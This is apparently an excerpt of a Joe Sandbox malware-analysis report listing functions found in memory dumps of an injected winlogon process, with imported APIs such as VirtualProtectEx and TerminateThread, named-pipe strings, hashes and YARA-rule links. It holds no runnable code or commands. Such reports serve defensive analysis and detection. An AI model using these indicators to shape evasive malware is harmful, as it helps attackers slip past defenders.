Instruction ID: 94470d76e8e99169dc1bd6030e286acf90538daadbbb330fa07aa5c63b58bfdf
Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction Fuzzy Hash: BD012931300A9082EB64DBA2A89C799A3A5F788BC5FC84076DE4E43765DF3DCD89C750

Function 000002D0165E36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002D0165E36E4
GetCurrentProcess.KERNEL32 ref: 000002D0165E36F2
VirtualProtectEx.KERNEL32 ref: 000002D0165E3714
GetCurrentProcess.KERNEL32 ref: 000002D0165E3732
VirtualProtectEx.KERNEL32 ref: 000002D0165E3753
TerminateThread.KERNEL32 ref: 000002D0165E3762

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction ID: 0ee65fdd732b982381bbf943d3faa4b165bcf9ac086ffcbc2b1acb993f4b5dc0
Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction Fuzzy Hash: 72012975211B80C2EF249BA1EC9C71A73A4BB49B86F94446ADD4D077B5EF3ECA488710

Function 000002D0165E8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002D0165E9013
_IsNonwritableInCurrentImage.LIBCMT ref: 000002D0165E90A8
RtlUnwindEx.NTDLL ref: 000002D0165E90F7

Strings

f, xrefs: 000002D0165E9026
csm, xrefs: 000002D0165E908E

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
Instruction ID: 289176f1ec5211bc532f7d3476c86f990fa8211b4c40f3c47dcc25eee0941410
Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
Instruction Fuzzy Hash: CB51A43270168086EF18DFA5EC8CB59B7BAF344B88F908526DE5A47758EB76CE41C700

Function 000002D0165E1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002D0165E1A60
StrCmpNIW.SHLWAPI ref: 000002D0165E1A7A
lstrlenW.KERNEL32 ref: 000002D0165E1A89
StrCpyW.SHLWAPI ref: 000002D0165E1A9E

Strings

\\?\, xrefs: 000002D0165E1A6E

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction ID: b0a73550e19d607c0733c4eed862a0f106358cff4bd746a1ba228e1ad1f57731
Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction Fuzzy Hash: B6F04F2270468192EB708FA1FCC87A9A760F748B89FD44022DA4D479A4DF7DCE8DCB10

Function 000002D0165E3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000002D0165E3066
StrCpyW.SHLWAPI ref: 000002D0165E3076
StrCatW.SHLWAPI ref: 000002D0165E3082
PathCombineW.SHLWAPI ref: 000002D0165E3090

Strings

\\.\pipe\, xrefs: 000002D0165E305C

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction ID: 9f9f7269bcd04a4d7622e5ff7d9e750e699f4d99e062e085e30b3f0fddd74a17
Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction Fuzzy Hash: 50F08C21704BD082EF008BA3BD8C219A260AB48FC0F888172EE4E07B79DF3CC9458710

Function 000002D0165EBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002D0165EBCBD
GetProcAddress.KERNEL32 ref: 000002D0165EBCD3
FreeLibrary.KERNEL32 ref: 000002D0165EBCFA

Strings

mscoree.dll, xrefs: 000002D0165EBCB4
CorExitProcess, xrefs: 000002D0165EBCCC

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction ID: 73b21768389709e2f3859606edec8d020a16b8eaf151ef1aa857b1fe75e1916b
Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction Fuzzy Hash: BCF06D61311A9581EF108BB4EC8C36A6361EB88BA1FD4025ADA6E462F4DF2DC9488320

Function 000002D0165E5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002D0165E5726

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
Instruction ID: 9867a48db4e2f8fc4ca8a19f3b7debced05d252233e4c618cb6bf9eff3b46b8e
Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
Instruction Fuzzy Hash: 2F619076519B84C6EB60CB95E88831AB7A0F384794F905116FACD47BB4DB7EC954CF00

Function 000002D016593504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002D01659352C
_set_statfp.LIBCMT ref: 000002D016593547
_set_statfp.LIBCMT ref: 000002D016593563
_set_statfp.LIBCMT ref: 000002D01659359F

Memory Dump Source

Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: d75896c64213f2a1704ddb0ef00b701f646facd3cf9c70f6f098307262c4cee0
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: 28117326A14ED1D2FB6415E8ECDD36916816B5C37CFC8A63AA96F466F7CA28CC414100

Function 000002D0165F4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002D0165F412C
_set_statfp.LIBCMT ref: 000002D0165F4147
_set_statfp.LIBCMT ref: 000002D0165F4163
_set_statfp.LIBCMT ref: 000002D0165F419F

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: 8658335e92f09a8eeac19449c432923065bddb668eaed47daa1299e6c01b2058
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: 4211A322A52BD411F76415E8DCDD76629406B783B8FC80AB6A97E177F7CB24CC554240

Function 000002D016623504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002D01662352C
_set_statfp.LIBCMT ref: 000002D016623547
_set_statfp.LIBCMT ref: 000002D016623563
_set_statfp.LIBCMT ref: 000002D01662359F

Memory Dump Source

Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: 066675a3227e3380ea6d786eb6367fb43d600c9f8a81345564ecb5b17240e5d6
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: F6113732664AD111FB5415E9ECFD36933816B597B4FD8462FA96E3A6F6CB24CC814200

Function 000002D01658F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002D01658F124

Strings

Wednesday, xrefs: 000002D01658F1ED
or copy constructor iterator', xrefs: 000002D01658F25A, 000002D01658F275
Tuesday, xrefs: 000002D01658F0F4

Memory Dump Source

Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: Tuesday$Wednesday$or copy constructor iterator'
API String ID: 3215553584-4202648911
Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction ID: 7926be692a7c3970f031dc47edbaea785ae167cdd99d474087a09ccf8e4f8d1a
Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction Fuzzy Hash: 4F617D666006C086FB659BEEEDCC32A6AA9A7897C4FD44517CB4F17FB5DB38CC418210

Function 000002D01661F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002D01661F124

Strings

Wednesday, xrefs: 000002D01661F1ED
Tuesday, xrefs: 000002D01661F0F4
or copy constructor iterator', xrefs: 000002D01661F25A, 000002D01661F275

Memory Dump Source

Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: Tuesday$Wednesday$or copy constructor iterator'
API String ID: 3215553584-4202648911
Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction ID: f15d629e17717bbc917658901b4faa7663f175d4ebde133506c68441a3da943e
Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction Fuzzy Hash: E3616B766006C042FA699BE9EDDD32A6AE1B7E7780FD5451FDA0E177B8DB38CC458200

Function 000002D0165EAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000002D0165EAA68
_CallSETranslator.LIBVCRUNTIME ref: 000002D0165EAAB7

Strings

MOC, xrefs: 000002D0165EAA7C
RCC, xrefs: 000002D0165EAA85

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 804a080e077f51fda726543e3350a461b6da8e690454341ee308e9e8ff120439
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: 8E615973A00B848AEB20DFA5D88439DB7B0F344B88F444216EF4D17BA8DB39CA95C700

Function 000002D01658A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002D01658A1A0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000002D01658A288

Strings

csm, xrefs: 000002D01658A2DA
csm, xrefs: 000002D01658A1C2

Memory Dump Source

Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: ef81340c4c69f026b87580c2449cc675fc22f141087421cbe63eea405b38429c
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 6E516B321006C0CAEB748BA7998835877A8F355B94F988217DE9D87FE5CB38DC91C700

Function 000002D0165EAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002D0165EADA0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000002D0165EAE88

Strings

csm, xrefs: 000002D0165EADC2
csm, xrefs: 000002D0165EAEDA

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: ad9e7e9185666ca75af795e8e0b1f6e55ca99cc2d9033536fe9523c4600d1b2c
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 9D517C761006C08AEF648BB599C8359B7A0F354B85F984217EE9D47BE5CB39DE90CB00

Function 000002D01661A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002D01661A1A0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000002D01661A288

Strings

csm, xrefs: 000002D01661A1C2
csm, xrefs: 000002D01661A2DA

Memory Dump Source

Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 9e3167ca6576018500916295b4619831fe4f002f2f09af4f197b6fb252918163
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 2A513C321042C0CAEB648B96998835D77E0F796B94F98921FDE9DC7BA5CB38DC91C701

Function 000002D016588405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002D016588413
_IsNonwritableInCurrentImage.LIBCMT ref: 000002D0165884A8

Strings

csm, xrefs: 000002D01658848E
f, xrefs: 000002D016588426

Memory Dump Source

Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: ebd46bf5b9efac163910b3874f46543552e5e73946441d757bd614891983f18b
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: 3251CE327017809AEB14DF96F888B193799F354B98F968126DA5F43FA8EB34DD41C704

Function 000002D016618405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002D016618413
_IsNonwritableInCurrentImage.LIBCMT ref: 000002D0166184A8

Strings

csm, xrefs: 000002D01661848E
f, xrefs: 000002D016618426

Memory Dump Source

Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: f9c655eb386e438f0f2053ae4425263734efa8a51b3dfbce355630ff0d2013ba
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: A451C1327116808AEB94CF55E888B1937A5F396B98F92C12EDE0F437A8EB34DC41C704

Function 000002D0165883E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002D016588413
_IsNonwritableInCurrentImage.LIBCMT ref: 000002D0165884A8

Strings

csm, xrefs: 000002D01658848E
f, xrefs: 000002D016588426

Memory Dump Source

Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: 7c97df61a7296e2470a292fba203d579020853e1c807cf3699b4a2e3da698be7
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: ED316632201780D6E714DB92EC88B1977A8F780B98F968016AE9F07BA8DB38CD41C704

Function 000002D0166183E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002D016618413
_IsNonwritableInCurrentImage.LIBCMT ref: 000002D0166184A8

Strings

csm, xrefs: 000002D01661848E
f, xrefs: 000002D016618426

Memory Dump Source

Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: 29a1c2b7482391fe9b085b1c522103b88ea60d3cf87a78046d7e28dde30d6717
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: 4C318B3260168096E764DF51EC88B1977A8F385BD8F96841EEE5F477A8DB38CD40C704

Function 000002D0165F2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002D0165F20D7
WriteFile.KERNEL32 ref: 000002D0165F239F
WriteFile.KERNEL32 ref: 000002D0165F23E5
GetLastError.KERNEL32 ref: 000002D0165F249B

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction ID: 5187ed22ee1aa0ccaa690343eb8763e497484eb7c5724e3e0ad55031fafd28ef
Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction Fuzzy Hash: A1D1D0B2B14A8089E711CFF9D88839C3BB1F3547D8F948256CE9D97BA9DA74C906C740

Function 000002D0165F2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 000002D0165F2A9C
GetLastError.KERNEL32 ref: 000002D0165F2B27

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction ID: fc307cff70842e2266af54710cb554fca6c11a8db0236a9223c07c1d4ecee361
Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction Fuzzy Hash: AA91AFB260069095F7609FE5DCC83AD2BA4B744BC8F94858BDE4E57AA5DB34CC86C700

Function 000002D0165E253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002D0165E2620
StrCpyW.SHLWAPI ref: 000002D0165E2639

Strings

\\.\pipe\, xrefs: 000002D0165E262B

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction ID: 8ed4e21bebd3e23e3000fdb066cfaa34740bf68bfd650f15aaa82489475c79c3
Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction Fuzzy Hash: 6871AF762007C18AEF649EA59CC83AAB794F389BC4F944127DD0E53BA9DE36CF458700

Function 000002D016589E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000002D016589EB7

Strings

RCC, xrefs: 000002D016589E85
MOC, xrefs: 000002D016589E7C

Memory Dump Source

Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 7d9756844898b90560aff503cb0a52449b1d73c23fde83014149b18977801b46
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: 36614A32600B848AEB24DFAAD88439D7BB4F744B88F444216EF4D17BA9DB38D955C740

Function 000002D016619E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000002D016619EB7

Strings

MOC, xrefs: 000002D016619E7C
RCC, xrefs: 000002D016619E85

Memory Dump Source

Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 5d37809f7588108028bd218765c44cfc940f184fd99cb5c5cdfab9f263f470b6
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: 1B616C37600B848AEB20DFA5D88439D7BA0F785B8CF54421AEF4D17BA9DB38D995C740

Function 000002D0165E2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002D0165E2416
StrCpyW.SHLWAPI ref: 000002D0165E242D

Strings

\\.\pipe\, xrefs: 000002D0165E2421

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction ID: 4e8424fe214da5e11d23322d54be976519fd80502f98cc10b4f99395f6fd04db
Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction Fuzzy Hash: B651A2326047C185EF649BAAA9DC3AAF751F385780FC58127DD9D07B6DDA3ACE048740

Function 000002D0165F26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002D0165F2807
GetLastError.KERNEL32 ref: 000002D0165F2829

Strings

U, xrefs: 000002D0165F27B3

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction ID: 34cadd197f94b95d681e4a8cd0f756d6a2bd82b0c53d0e2054fc3c1200778bca
Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction Fuzzy Hash: 19419572715BC085DB209FA5E8883AAB7A1F7987D4F908026EE4D877A4DB7CC945C740

Function 000002D0165E94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002D0165E94F0
RaiseException.KERNEL32 ref: 000002D0165E9531

Strings

csm, xrefs: 000002D0165E951E

Memory Dump Source

